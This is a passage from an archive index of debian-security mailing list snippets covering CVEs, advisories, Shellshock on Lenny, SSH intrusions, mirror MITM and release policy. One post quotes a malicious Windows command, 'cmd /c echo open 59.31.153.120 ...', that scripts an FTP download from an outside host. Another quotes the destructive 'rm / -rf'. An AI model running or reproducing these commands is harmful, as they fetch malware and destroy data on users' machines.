Re: Should Debian ask for a CPE when a CVE in Debian is found?

2024-12-01 Thread David A. Wheeler
tes that "Purl is currently in use as a de facto standard in many situations" and the value of using DNS-based approaches (purl is one). --- David A. Wheeler

I Joined This List

2024-11-07 Thread David Campbell
t going to bother jumping through hoops just to appease them. Anyone who's interested in Debian security matters should subscribe to the mailing list or read its archives in a Web browser at the very least. -- David Campbell

Re: dpkg MD5

2024-11-07 Thread David Campbell
Nope, but I thought that may be a way to make check summing more useful. On 11/7/24 17:08, Jonathan Hutchins wrote: Do you have any evidence that there has been an attempt to post bogus packages to the official mirrors? -- David Campbell

dpkg MD5

2024-11-07 Thread David Campbell
ss in the CC if you respond to this message. I am not subscribed to the mailing list. -- David Campbell

Re: not getting compromised while applying apt-get upgrade for CVE-2016-1252

2016-12-16 Thread David Kalnischkies
g additional hurdle… [or you have a "trusted" (local) mirror] – you do perform checks, don't you? btw: debootstrap happens without apt being involved as you can bootstrap from basically any system – getting apt to run on any system while not entirely impossible is considerably harder and i

Re: Remove email

2016-03-31 Thread David Cachau
Hello, You need to send a mail to debian-security-requ...@lists.debian.org with "unsubscribe" as subject. You can also unsubscribe from some lists here: https://www.debian.org/MailingLists/unsubscribe Best regards On 31/03/2016 16:42, Tiffany Ryan wrote: > > Please remove my email from you sys

Should Debian ask for a CPE when a CVE in Debian is found?

2016-02-12 Thread Wheeler, David A
s for identification. More info on requesting CPEs here: https://nvd.nist.gov/cpe.cfm I thought I'd raise the idea. Thanks! --- David A. Wheeler

Re: [SECURITY] [DSA 3438-1] xscreensaver security update

2016-01-10 Thread David Cachau
Hello, You can follow instructions on this URL: https://www.debian.org/MailingLists/#subunsub Or use this form: https://www.debian.org/MailingLists/unsubscribe Good bye On 11/01/2016 00:04, David ISIDORE wrote: > Hi, I'm not on Debian anymore. How can I unsubscribe from mail

Re: [SECURITY] [DSA 3438-1] xscreensaver security update

2016-01-10 Thread David ISIDORE
Hi, I'm not on Debian anymore. How can I unsubscribe from mailing list? 2016-01-10 20:08 GMT+01:00 Michael Gilbert : > -BEGIN PGP SIGNED MESSAGE- > Hash: SHA512 > > - - > Debian Security Advisory DSA-3438-1

RE: [SECURITY] [DSA 3386-2] unzip regression update

2015-11-11 Thread David McDonald
Salvatore Bonaccorso Sent: Wednesday, 11 November 2015 4:52 PM To: David McDonald Cc: 'debian-security@lists.debian.org' Subject: Re: [SECURITY] [DSA 3386-2] unzip regression update Hi Dave, On Tue, Nov 10, 2015 at 09:54:19PM +, David McDonald wrote: > Thank you Salvatore & Thijs

RE: [SECURITY] [DSA 3386-2] unzip regression update

2015-11-10 Thread David McDonald
rom: Salvatore Bonaccorso [mailto:salvatore.bonacco...@gmail.com] On Behalf Of Salvatore Bonaccorso Sent: Tuesday, 10 November 2015 8:46 PM To: David McDonald Cc: 'debian-security@lists.debian.org' Subject: Re: [SECURITY] [DSA 3386-2] unzip regression update Hi David, On Tue, Nov 10,

RE: [SECURITY] [DSA 3386-2] unzip regression update

2015-11-09 Thread David McDonald
Hi Salvatore, Your e-mail below states: "For the stable distribution (jessie), this problem has been fixed in version 6.0-16+deb8u2" (Nota bene the last digit) However, https://www.debian.org/security/2015/dsa-3386 states: "For the stable distribution (jessie), these problems h

Re: [SECURITY] [DSA 3265-1] zendframework security update

2015-05-20 Thread David Peacock
Unsubscribe On 20 May 2015 at 05:37, David Prévot wrote: > -BEGIN PGP SIGNED MESSAGE- > Hash: SHA512 > > - - > Debian Security Advisory DSA-3265-1 secur...@debian.org > htt

Re: [SECURITY] [DSA 3149-1] condor security update

2015-02-03 Thread David Schneider
Hello Günter, I am the deputy for Security (until Salvatore is back). Could you check whether we are affected by this (see below)? Regards, David Schneider On 02.02.2015 19:50, Sebastien Delafond wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA256

Re: [SECURITY] [DSA 3074-2] php5 regression update

2014-11-19 Thread David MENTRE
, david -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/546caccf.8070...@linux-france.org

Re: [SECURITY] [DSA 3074-2] php5 regression update

2014-11-19 Thread David MENTRE
Hello, On 19/11/2014 11:49, Yves-Alexis Perez wrote: so people are advised to keep kernel symlink protection (sysctl fs.protected_symlinks=1) enabled as it is by default on Wheezy This setting is not set on my Wheezy machine. How can I set it permanently (i.e. across reboots)? Best regard

Archive GPG key expiring process

2014-10-17 Thread David Hubner
after the attack happened with a new master key that would mean nobody could apt-get the debian-keyring package for the new public key. I am wondering if I am missing something. Is there a process for this possibility? Thanks -- David Hubner Software Engineer david.hub...@smoothwall.net

Re: about bash and Debian Lenny

2014-10-01 Thread David Dejaeghere
Also about not trusting people, you are sending to this list with your company email address and tell everyone here you have an exploitable qmail setup running. Be careful with the information you make public. Regards, David 2014-10-01 14:17 GMT+02:00 David Dejaeghere : > With Qmail expo

Re: about bash and Debian Lenny

2014-10-01 Thread David Dejaeghere
With Qmail exposed and being an attack vector I would advise to build your own updated bash package. You won't get official security updates. 2014-10-01 14:06 GMT+02:00 Nikolay Hristov : > On 10/01/2014 02:58 PM, Konstantin Khomoutov wrote: > >> On Wed, 1 Oct 2014 14:45:55 +0300 >> Nikolay Hristov

Re: about bash and Debian Lenny

2014-10-01 Thread David Dejaeghere
hellshock alone with Debian Lenny in its current state. If you need to secure your old boxes you will have to look for alternative methods outside of supported packages. Think about improved firewalling. What attack vectors of the shellshock exploit are worrying to you? Regards, David 2014-1

Re: Checking for services to be restarted on a default Debian installation

2014-09-10 Thread David Prévot
in the loop (for translation call coordination, or even i18n help if needed) if you wish to. Regards David

Re: Checking for services to be restarted on a default Debian installation

2014-09-07 Thread David Prévot
On 07/09/2014 10:54, Paul Wise wrote: > On Sun, Sep 7, 2014 at 9:30 PM, David Prévot wrote: >> How does it work if the upgrade runs in the background? Will all needed >> services be restarted without asking? (If so, the gdm3 restart issue may >> be a blocker). > > No

Re: Checking for services to be restarted on a default Debian installation

2014-09-07 Thread David Prévot
ault installation? Are there drawbacks? Not restarting by default the DM seems to be nice thing to have. How does it work if the upgrade runs in the background? Will all needed services be restarted without asking? (If so, the gdm3 restart issue may be a blocker). Regards David

Re: Checking for services to be restarted on a default Debian installation

2014-09-02 Thread David Prévot
rity-update Regards David

Re: Please remove me from this list

2014-06-26 Thread Erwan David
On 26/06/2014 16:06, Jason Fergus wrote: > Ha ha, made me laugh. > > Speaking of lists, I wish I knew how Evolution knows to ask if one would > like to reply to the list or the sender. My work uses a bunch of > mailing lists, and I always feel like I'm breaking list etiquette when I > have to

Re: Debian mirrors and MITM

2014-05-30 Thread Erwan David
On 30/05/2014 22:02, Henrique de Moraes Holschuh wrote: > On Fri, 30 May 2014, Erwan David wrote: >> On 30/05/2014 21:30, Joey Hess wrote: >>> Alfie John wrote: >>>> Taking a look at the Debian mirror list, I see none serving over HTTPS: >>>> ht

Re: Debian mirrors and MITM

2014-05-30 Thread Erwan David
On 30/05/2014 21:30, Joey Hess wrote: > Alfie John wrote: >> Taking a look at the Debian mirror list, I see none serving over HTTPS: >> >> https://www.debian.org/mirror/list > https://mirrors.kernel.org/debian is the only one I know of. > > It would be good to have a few more, because there ar

Re: Debians security features in comparison to Ubuntu

2014-05-17 Thread Erwan David
On 17/05/2014 18:38, Jan Moskyto Matejka wrote: >> I might be misinterpreting your definition of "meaningful", but I >> have been looking for a public entropy source for my Debian system >> for quite a while. If you can point me to the Debian equivalent of >> pollinate and https://entropy.ubuntu

Re: finding a process that bind a spcific port

2014-01-22 Thread Erwan David
On Wed, Jan 22, 2014 at 02:33:27PM CET, Nico Angenon said: > no output > > Thanks for all... > > Nico You may also try lsof -i udp:10001 Launch it as root, because a normal user cannot see the descriptors of processes owned by others. -- To UNSUBSCRIBE, email to debian-security-requ...

Re: MIT discovered issue with gcc

2013-11-27 Thread David L. Craig
On 13Nov27:2356+1100, Scott Ferguson wrote: > On 27/11/13 23:37, David L. Craig wrote: > > On 13Nov27:1423+1100, Scott Ferguson wrote: > > > >> On 27/11/13 13:49, David L. Craig wrote: > > > >>> On 13Nov26:1545-0500, David L. Craig wrote: > >

Re: MIT discovered issue with gcc

2013-11-26 Thread David L. Craig
On 13Nov26:1545-0500, David L. Craig wrote: > On 13Nov26:1437-0500, Mark Haase wrote: > > > Therefore, a Linux distribution has 2 choices: (1) wait for upstream > > patches for bugs/vulnerabilities as they are found, or (2) recompile all > > packages with optimizations

Re: MIT discovered issue with gcc

2013-11-26 Thread David L. Craig
On 13Nov26:1437-0500, Mark Haase wrote: > Therefore, a Linux distribution has 2 choices: (1) wait for upstream > patches for bugs/vulnerabilities as they are found, or (2) recompile all > packages with optimizations disabled. I don't think proposal #2 would get > very far... Well, there's always

Re: [SECURITY] [DSA 2758-1] python-django security update

2013-09-17 Thread David Moscrip
Salvatore Bonaccorso wrote: >-BEGIN PGP SIGNED MESSAGE- >Hash: SHA512 > >- - >Debian Security Advisory DSA-2758-1 secur...@debian.org >http://www.debian.org/security/ Salvatore

Re: (Case MB46439) [SECURITY] [DSA 2641-2] libapache2-mod-perl2 update related to DSA 2641-1

2013-03-20 Thread David Dejaeghere
I hope that is a golden ticket. I want to visit the chocolate factory! 2013/3/20 Mythic Beasts > Thank you for your mail to Mythic Beasts Support. Your query has been > received, and we will respond shortly. Please preserve the case number > in the subject line of any replies regarding this ti

Re: NULL Scan issues or something else?

2013-02-08 Thread Erwan David
On Fri, Feb 08, 2013 at 02:06:48PM CET, Daniel Curtis said: > Hi Mr Erwan > > So, everything is okay? Even these strange logs > mentioned earlier? I'm still curious about this rule; > SYN,RST, ACK,FIN, PSH,URG, SYN,RST,ACK, > FIN,PSH,URG > > What do you mean by writing, that I should not contac

Re: NULL Scan issues or something else?

2013-02-07 Thread Erwan David
On 07/02/2013 21:22, Daniel Curtis wrote: Hi, >> (...) Nothing that should bother you. Okay, so far so good. But what about the rest of IP addresses, which occurred in logs? You have mentioned about a bendel.debian.org website. I wonder why? Because that's the

Re: NULL Scan issues or something else?

2013-02-07 Thread Erwan David
On 07/02/2013 19:34, Daniel Curtis wrote: Hi Thank you all for your answers. They are very helpful. I have to mention something, which I forgot to write; * no running services * all ports are closed (according to e.g. nmap) * iptables has concerning rules about /INVALID/ packets * f

Re: Use of DSA number for general announcements

2012-09-15 Thread David Prévot
Hi, On 14/09/2012 01:47, Thijs Kinkhorst wrote: > On Fri, September 14, 2012 03:28, David Prevot wrote: >>> This is a notice to inform you, that our previous PGP/GPG key expired. >> >> Thanks for notifying us on debian-security-announce@l.d.o, but I >> disa

Use of DSA number for general announcements (was: [DSA 2548-1] Debian Security Team PGP/GPG key change notice)

2012-09-13 Thread David Prévot
blicity team next time you prepare a big announcement. Regards David

Bug#685646: Please advise a reliable version scheme for {stable,testing}{,-security}

2012-08-22 Thread David Prévot
t: fwiw, at least until I change my mind I'd say $c > $c-p-u > t > tpu […] 16:44 < adsb> using the codename everywhere would have saved a bit of pain with e.g. security updates which were prepared for lenny-as-stable but not published until after the squeeze release for some reas

Re: sun-java6-plugin outdated and vulnerable to an actively exploited security issue

2012-08-16 Thread Erwan David
On Thu, Aug 16, 2012 at 11:37:09AM CEST, Thijs Kinkhorst said: > Hi Adam, > > On Thu, August 16, 2012 07:56, echo083 wrote: > > The sun-java6 in the stable branch is the version 1.6.0_26 is there a > > plan for any security upgrade ? > > I'm afraid that's not possible. Oracle has changed licens

Re: [SECURITY] [DSA 2523-1] globus-gridftp-server security update

2012-08-08 Thread David Prévot
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 On 08/08/2012 20:25, Mike Mestnik wrote: > On 08/06/12 22:47, maestro wrote: >> #please unsubscribe me from this list >> # i do not find any link to do so. >> # thank you. >> > Instructions can be found at the bottom, there is no link or URL. Act

Security Implications of DKMS?

2012-03-26 Thread David Ehle
ble to avoid? Is this limiting the use of DKMS? How are you balancing the convenience (now sometimes "need") of DKMS vs the risk of having compilers on servers? If you're saying "no," how are you getting the modules onto your secure systems? If this is a "solved

Re: Debian Oval definitions for 2011

2011-10-11 Thread David Prévot
nitions-2011.xml Thanks for your hint, Javier (author of the script used to generate those) and the security team CCed to gather more information. Regards David

Re: Debian LTS?

2011-10-05 Thread Erwan David
On 06/10/11 00:13, Sythos wrote: > On Wed, 05 Oct 2011 19:13:33 +0200 > wer...@aloah-from-hell.de wrote: > >> Hi all, >> >> a Debian LTS-Version would be so welcome and is definitely >> something that's missing for Debian. >> > > in 18 years Debian released 6 "stable", an average of 3 years be

Re: Debian LTS?

2011-10-05 Thread Erwan David
On 05/10/11 19:13, wer...@aloah-from-hell.de wrote: > Hi all, > > a Debian LTS-Version would be so welcome and is definitely something that's > missing for Debian. > > best, > Werner Isn't it called "stable" ? -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subj

Fwd: Application Icons Design

2011-09-12 Thread David
twitter ===8<==Original message text=== Hello David, >Timeframe is 3 weeks. It's possible to discuss a budget next week with skype, >Please try to ask the following icon designer: >debian-security@lists.debian.org ===8<===End of o

Re: AUTO: Steve Bownas is out of the office. (returning 09/06/2011)

2011-08-21 Thread David Giard
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Are we going to receive those every time he is out of the office? I hope someone will do something about it... On 2011-08-21 16:17, Steven Bownas wrote: > > I am out of the office until 09/06/2011. > > I will be out of the office from Mon Aug 22 thro

Re: CVE Exploit

2011-03-11 Thread Erwan David
On Fri, Mar 11, 2011 at 04:08:29PM CET, Mike! said: > On 03/11/2011 04:06 PM, Jordon Bedwell wrote: > >On 3/11/2011 9:04 AM, Andrey Rahmatullin wrote: > >>On Fri, Mar 11, 2011 at 09:42:17AM -0500, hans wrote: > >>>rm / -rf worked fine last time I tried it on a VM as an experiment. > >>It was fixed

No DSA for isc-dhcp

2011-03-04 Thread David Prévot
Thanks in advance if you could fix this. Regards David

Re: "unprivileged users may hijack forwarded X connections"

2008-04-29 Thread David Ehle
patch. -- David Ehle Computing Systems Manager CAPP CSRRI rm 077 LS Bld. IIT Main Campus Chicago IL 60616 [EMAIL PROTECTED] 312-567-3751 He who fights with monsters must take care lest he thereby become a monster. And if you gaze for long into an abyss, the abyss gazes also into you. On Tue, 29 Apr

"unprivileged users may hijack forwarded X connections"

2008-04-29 Thread David Ehle
anyone know if this has been addressed? Are there any plans to do so? Thanks! -- David Ehle Computing Systems Manager CAPP CSRRI rm 077 LS Bld. IIT Main Campus Chicago IL 60616 [EMAIL PROTECTED] 312-567-3751 He who fights with monsters must take care lest he thereby become a monster. And if yo

Re: Re: Is oldstable security support duration something to be proud of?

2008-03-10 Thread David Ehle
Please take this discussion off list. It has nothing to do with security. Take it to some list that has to do with debian policy, announcements, the web-page or anyplace else where it might be relevant. Great job Security team. Thanks for all your work. -- David Ehle Computing Systems

Re: [SECURITY] [DSA 1479-1] New Linux 2.6.18 packages fix several vulnerabilities

2008-01-29 Thread David Nowak
Moe sir what is the code for the phone I'm havin a brain fart -Original Message- From: [EMAIL PROTECTED] To: [EMAIL PROTECTED] [EMAIL PROTECTED] BCC: David Nowak <[EMAIL PROTECTED]> Creation Date: 1/29 1:04 pm Subject: [SECURITY] [DSA 1479-1] New Linux 2.6.18 packages

Debian suggestion on File Deletion

2007-12-12 Thread David de Hilario Richards
would ask for a password every time you would want to delete a file. To my knowledge, today the only way of protecting files in a similar way is to create different user profiles with different permissions. Hope you will take my suggestion into account. Regards, David

Restrict remote access by time?

2007-05-25 Thread David Ehle
the criteria, I would welcome any suggestions, research leads, or input from those who have put together similar projects. Thanks in Advance! David. -- David Ehle Computing Systems Manager CAPP CSRRI rm 077 LS Bld. IIT Main Campus Chicago IL 60616 [EMAIL PROTECTED] 312-567-3751 He who fights

Re: spooky windows script

2007-05-08 Thread David Clymer
On Tue, 2007-05-08 at 14:57 +0200, Jan Outhuis wrote: > Hello, > > Recently I'm repeatedly being pestered by a strange event while surfing the > net. My cursor is taken over and the following code is typed: > > %systemroot%\system32\cmd.exe > cmd /c echo open 59.31.153.120 22783 >> ik &echo user

Re: [SECURITY] [DSA 1195-1] new openssl096 packages fix denial of service

2006-10-10 Thread David Kennedy CISSP
-- Regards, David Kennedy CISSP. ASCII Ribbon Campaign Against HTML Mail. Protect what you connect; Look both ways before crossing the Net.

Re: About GPG-signing the public RSA keys of Debian machines

2006-10-10 Thread David Clymer
On Tue, 2006-10-10 at 22:24 +0200, Joerg Jaspert wrote: > On 10803 March 1977, Kurt Roeckx wrote: > > > I assume you've used https and that you verified the certificate? > > And saw that it was issued by SPI? And then you looked up SPI's > > certificate? And you found that there is a text file

Re: About GPG-signing the public RSA keys of Debian machines

2006-10-10 Thread David Clymer
On Tue, 2006-10-10 at 21:57 +0200, Florent Rougon wrote: > [ I think debian-admin have read enough about my request by now, so if > you reply about verifying certificates and such, please consider > dropping the CC. Thanks. ] > > Kurt Roeckx <[EMAIL PROTECTED]> wrote: > > > See: > > http://l

Re: About GPG-signing the public RSA keys of Debian machines

2006-10-10 Thread David Clymer
On Tue, 2006-10-10 at 02:12 +0200, Joerg Jaspert wrote: > On 10802 March 1977, Florent Rougon wrote: ... > > > 2. I have to trust the integrity of db.debian.org. > > Signing the keys you would have to trust whoever signed it. Same thing. > I don't see that as being the same thing at all. W

Re: [SECURITY] [DSA 1172-1] New bind9 packages fix denial of service

2006-09-09 Thread David Broome
it failed with: Sep 9 00:28:15 stan named[5638]: couldn't open pid file '/var/run/bind/run/named.pid': Permission denied Sep 9 00:28:15 stan named[5638]: exiting (due to early fatal error) I just had to change the 'bind' users group to the new bind group. Dave, -- Da

Re: "su -" and "su" - what is the real difference?

2006-07-28 Thread David Ehle
nment. So, I would be interested in hearing what the additional security implications would be. David. -- David Ehle Computing Systems Manager CAPP CSRRI rm 077 LS Bld. IIT Main Campus Chicago IL 60616 [EMAIL PROTECTED] 312-567-3751 He who fights with monsters must take care lest he thereby bec

AW: [SECURITY] [DSA 1048-1] New Asterisk packages fix arbitrary codeexecution

2006-05-02 Thread David Lindner
I think we always use the latest stable version. Best regards, D -Original Message- From: Martin Schulze [mailto:[EMAIL PROTECTED] Sent: Monday, 01 May 2006 06:38 To: Debian Security Announcements Subject: [SECURITY] [DSA 1048-1] New Asterisk packages fix arbitrary codeexec

Re: Pam module for hylafax

2006-04-18 Thread David Clymer
On Tue, 2006-04-18 at 17:39 +0400, Adarsh V.P wrote: > hi > i am using hylafax with debian sarge.I can only use the fax > utilities(sendfax,faxstat,...) while logging in as root. > Access is denied while trying to connect to the hylafax server from clients. > i just made a module called hylafax and

unsubscribe

2006-03-15 Thread Antonio David Lopez
-Original Message- From: Martin Schulze [mailto:[EMAIL PROTECTED] Sent: Wednesday, 15 March 2006 9:43 To: Debian Security Announcements Subject: [SECURITY] [DSA 1002-1] New webcalendar packages fix several vulnerabilities -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -

Re: Bonk vulnerability!

2006-03-03 Thread David Clymer
On Fri, 2006-03-03 at 13:01 -0700, Michael Loftis wrote: > > > --On March 3, 2006 10:01:54 AM -0800 Zakai Kinan <[EMAIL PROTECTED]> > wrote: > > > I just installed a server with sarge 3.1 and after > > testing it with nessus it is vulnerable to bonk. I am > > trying to figure out how that is

RE: Weird message in my apache error log

2006-02-01 Thread David Johnson
I've seen this type of thing with PHP; I was going to say something but I figured I would wait since you didn't mention it. Can you correlate the time/date/ip with the request from access.log? It might give you more information. I can say, that we get attacked regularly on Sarge and we're a rela

RE: Weird message in my apache error log

2006-01-31 Thread David Johnson
What does your application do? It looks like it is finding a shell script somewhere? We've seen similar things when executing CGI's and not filtering the input data so well. The line 22, 24 make me think there is a script somewhere rather than arbitrary GET data. > -Original Message- > F

Re: [SECURITY] [DSA 926-1] New ketm packages fix privilege escalation

2005-12-23 Thread david . ahlard
Hi, I am on Christmas leave and will not be back until Monday 2 January. For installation matters, mail [EMAIL PROTECTED] or call pay&read on 08-20 83 70. Kind regards, David Ahlard -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe

Re: help

2005-12-10 Thread David Clymer
On Sat, 2005-12-10 at 23:43 -0500, Luis A. Rondon Paz wrote: > > > > This email contains the help you requested. -davidc -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: unsubscribe

2005-10-12 Thread David Clymer
On Thu, 2005-10-13 at 01:28 +0200, Peter Palfrader wrote: > On Tue, 11 Oct 2005, Benjamin Maerte wrote: > > > -- > > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > > with a subject of "unsubscribe". Trouble? Contact > > [EMAIL PROTECTED] > > > > Learn to read the mails you're replying to, will

Re: SELinux

2005-09-21 Thread David Pastern
On Thu, 2005-09-22 at 04:40 +1000, Arvind Autar wrote: > Hello, > > I have been using debian for quite some time now, however I have > watched several distributions implementing so many great ideas, and I > have been wondering why such a robust distribution as debian > GNU/Linux(*) hasn't done

Re: policy change is needed to keep debian secure

2005-08-23 Thread David Ehle
On Tue, 23 Aug 2005, Matt Zimmerman wrote: > On Tue, Aug 23, 2005 at 12:04:17PM -0500, David Ehle wrote: > > > As you can see in the subject, the OP understands the policy, but believes > > it should be changed. > > To what? The suggestions that I have seen so far se

Re: policy change is needed to keep debian secure

2005-08-23 Thread David Ehle
a package list fixed in amber can keep their system offline and not put the security line in their sources- as security will require changes at some level. I support introducing new packages when older versions can not be realistically maintained with backported security fixes. -- David Ehle Co

Re: policy change is needed to keep debian secure

2005-08-21 Thread David Ehle
I second this post. Dan, Thank you for saying so clearly. On Sat, 20 Aug 2005, Daniel Sterling wrote: > Keeping Debian stable by not changing things is great. > > Except maybe its not so great when you're trying to maintain a complicated, > buggy, high profile program that handles sensitive use

Re: On Mozilla-* updates

2005-08-02 Thread David Ehle
woe-is-me-they-wont-play-like-i-like-i-hate-change fashion, and the situation either not be resolved or we do something stupid like drop mozilla. Just for the record I also vote against volatile. Security changes should go into stable proper. david. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED]

Re: On Mozilla-* updates

2005-08-02 Thread David Ehle
rvers that can be used to build at least two of the architectures. David. -- David Ehle Computing Systems Manager CAPP CSRRI rm 077 LS Bld. IIT Main Campus Chicago IL 60616 [EMAIL PROTECTED] 312-567-3751 He who fights with monsters must take care lest he thereby become a monster. And if you gaz

Re: On Mozilla-* updates

2005-07-31 Thread David Ehle
analysis systems we have over 75 "sit down" systems. Debian in MY opinion is as much a desktop distro as it is a server distro, and support for both is equally important. David. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: On Mozilla-* updates

2005-07-31 Thread David Ehle
> Despite of the fact, that the release is probably unable to match the mozilla > release cycles - do you really think, mozilla is the one and only package, > debian is all about? Well, I mean the killer application, the thing that > justify Debian? > > Keep smiling > yanosz > For my end users, who

Re: "root login denied". But by what?

2005-06-17 Thread David Ramsden
On Fri, Jun 17, 2005 at 10:47:49PM +0200, Marcin Owsiany wrote: > On Fri, Jun 17, 2005 at 07:33:02PM +0100, David Ramsden wrote: > > Does anyone know what generated the above log entries? > > try: > > find /usr/sbin /sbin /usr/local/sbin \ > /usr/bin /usr/local/bin

"root login denied". But by what?

2005-06-17 Thread David Ramsden
he latest release of stable. Does anyone know what generated the above log entries? And why is there "no ip"? Regards, David. -- .''`. David Ramsden <[EMAIL PROTECTED]> : :' :http://david.hexstream.co.uk/ `. `'` PGP key ID: 507B379B on wwwkeys.pg

Security status of orphaned woody packages when upgraded to sarge?

2005-05-10 Thread David Stanaway
even if you check debian security advisories diligently. -- David Stanaway <[EMAIL PROTECTED]> -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: User 501 and /usr/local

2005-05-09 Thread David Clymer
On Mon, 2005-05-09 at 07:30 -0700, JM wrote: > I guess what I was trying to say > should not this directory be owned by root and with a 755 permissions? > Default debian permissions on /usr/local are: drwxrwsr-x 11 root staff 115 2005-03-23 13:42 local -davidc -- It is not the mountain we

Re: Dns refresh

2005-04-27 Thread David Clymer
There is really no excuse for such egregious cross posting. Please send questions to appropriate mailing lists only, preferably one at a time. On Wed, 2005-04-27 at 15:58 -0300, Servilink Santiago Francos wrote: > > Hello, I have a server and I changed the ip number of the server and > the name

Snort log stuff

2005-04-18 Thread David Clymer
Over the last few days, I've seen the following type of entry in my snort report: The distribution of event methods === %# of method === 5.81 5 (portscan) TCP Portsweep 3

Re: OT - was Re: My machine was hacked - possibly via sshd?

2005-03-30 Thread David Pastern
On Wed, 2005-03-30 at 21:35 +1000, Ivan Brezina wrote: > Let me point, that meaning of word "stable" is different for RedHat/SUSE. > Debian "stable" is more like "frozen" - no bugfixes, no new drivers > no new features. Just security fixes and some "critical" fixes. > > RedHat "stable" is mor

Re: My machine was hacked - possibly via sshd?

2005-03-30 Thread David Pastern
On Wed, 2005-03-30 at 20:34 +1000, Matthew Palmer wrote: > On Wed, Mar 30, 2005 at 07:02:55PM +1000, David Pastern wrote: > > Redhat/Fedora/Suse/Mandrake are just plain silliness. However - there > > is a big difference between a one year release cycle, and the fact that > &g

Re: My machine was hacked - possibly via sshd?

2005-03-30 Thread David Pastern
On Wed, 2005-03-30 at 17:55 +1000, Andrew M.A. Cater wrote: > On Tue, Mar 29, 2005 at 05:08:32PM -0500, Noah Meyerhans wrote: > > On Wed, Mar 30, 2005 at 07:16:31AM +1000, David Pastern wrote: > > > And this, in reality, is why Woody is so old. I cannot imagine any > >

Re: My machine was hacked - possibly via sshd?

2005-03-29 Thread David Pastern
On Tue, 2005-03-29 at 15:25 -0500, Noah Meyerhans wrote: > On Tue, Mar 29, 2005 at 01:38:55PM +0100, Simon Heywood wrote: > > > Sorry, but this isn't correct. kernel 2.4.18-1 in woody is patched > > > against known vulnerability. > > > > The security team have quietly stopped updating it, prefer

Re: My machine was hacked - possibly via sshd?

2005-03-28 Thread David Pastern
On Tue, 2005-03-29 at 07:25 +1000, Malcolm Ferguson wrote: > Thanks for all the feedback everybody. It looks like an ssh dictionary > attack discovered a weak password, followed by a local root exploit > against an out-of-date kernel. From now on I will be sticking with an > official Debian st

Re: Analysis vulnerabilities associated to published security advisories, anyone?

2005-03-09 Thread David Schmitt
tput here along with input and output. > > http://people.debian.org/~skx/2005/ Nice script. I fixed it up to sanitise 'sanitizations' and sort output by count. diff attached. Regards, David -- - hallo... wie gehts heute? - *hust* gut *rotz* *keuch* - gott sei dank kommunizieren

Re: Packet sniffing & regular users

2005-03-03 Thread David Mandelberg
Alvin Oga wrote: > ah .. good point ... i make no distinction between "local access" > vs "physical access" in that if the server is behind the locked > door, it'd be better than if its on the corp server in the next > open cubicle on the same cat 5 wires, hubs and switches etc Physical access mea

Re: Packet sniffing & regular users

2005-03-02 Thread David Mandelberg
Alvin Oga wrote: > no more telnet, no more pop3, no more wireless, no more > anything that is insecure Those are not insecure: using them unwisely is. Telnet over a VPN is just as secure as ssh with password authentication. The same goes for pop3/pop3s. Wireless is completely different

Re: Packet sniffing & regular users

2005-03-02 Thread David Mandelberg
s. keeling wrote: > Isn't it generally accepted that black hats who get local access (ie., > a user login account) is _much_ worse than black hats who've been kept > out? Assuming black hat wants root, taking over a user's account is a > very big first step. > > I would take the security of your u

Re: Packet sniffing & regular users

2005-03-02 Thread David Mandelberg
s. keeling wrote: > "... should be" != "are." Are you sure no-one there's using telnet, > ftp, & etc? If they send their confidential data unencrypted, that's not my fault, and there's not much I can do to stop them (even if I somehow make it impossible on my computers, they could still go to a li

Re: Packet sniffing & regular users

2005-03-02 Thread David Mandelberg
s. keeling wrote: > Do you understand what "anyone can see anything" really means? Have > you pumped tcpdump output into ethereal lately? > > "anyone can see anything" really means "anyone can see anything". > Think about it. And what's the real reason why you don't want to > bother with sudo? I'
